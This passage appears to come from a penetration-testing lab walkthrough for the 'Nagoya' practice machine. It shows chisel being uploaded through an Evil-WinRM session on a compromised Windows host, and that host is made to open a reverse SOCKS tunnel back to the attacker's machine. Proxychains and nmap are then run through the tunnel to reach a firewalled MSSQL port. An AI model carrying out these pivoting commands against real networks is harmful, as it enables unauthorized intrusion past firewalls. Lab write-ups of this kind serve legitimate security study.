MSSQL
There is an MSSQL instance running on the target port 1433.
Since the port is blocked by the firewall, I would need to tunnel it in order to access it from Kali.
Tunneling with Chisel
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ chisel server -p 55555 --reverse --socks5 -v
2025/04/23 21:35:34 server: Reverse tunnelling enabled
2025/04/23 21:35:34 server: Fingerprint bBEpef+fFYCFAJUXUJ06p41uTc7hwLvo3tE9Tnb/Sr4=
2025/04/23 21:35:34 server: Listening on http://0.0.0.0:55555Starting a Chisel server on Kali
Grabbing the fingerprint; bBEpef+fFYCFAJUXUJ06p41uTc7hwLvo3tE9Tnb/Sr4=
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> upload chiselx64.exe
Info: Uploading /home/kali/PEN-200/PG_PRACTICE/nagoya/chiselx64.exe to C:\Users\Christopher.Lewis\Documents\chiselx64.exe
Data: 13014356 bytes of 13014356 bytes copied
Info: Upload successful!Transferring Chisel via the established WinRM session
*Evil-WinRM* PS C:\Users\Christopher.Lewis\Documents> Start-Job { & "C:\Users\Christopher.Lewis\Documents\chiselx64.exe" client -v --fingerprint "bBEpef+fFYCFAJUXUJ06p41uTc7hwLvo3tE9Tnb/Sr4=" 192.168.45.220:55555 R:48823:socks }
Id Name PSJobTypeName State HasMoreData Location Command
-- ---- ------------- ----- ----------- -------- -------
1 Job1 BackgroundJob Running True localhost & "C:\Users\Christoph...Connecting to Kali
/Practice/Nagoya/4-Post_Enumeration/attachments/{B285006B-608B-46C3-97F0-0CDD0467BC33}.png)
Session established
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/nagoya]
└─$ sudo proxychains4 -q nmap -sT $IP -p1433
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-23 21:00 CEST
Nmap scan report for nagoya.nagoya-industries.com (192.168.158.21)
Host is up (0.031s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
Nmap done: 1 IP address (1 host up) scanned in 0.20 secondsThe target MSSQL instance is now accessible from Kali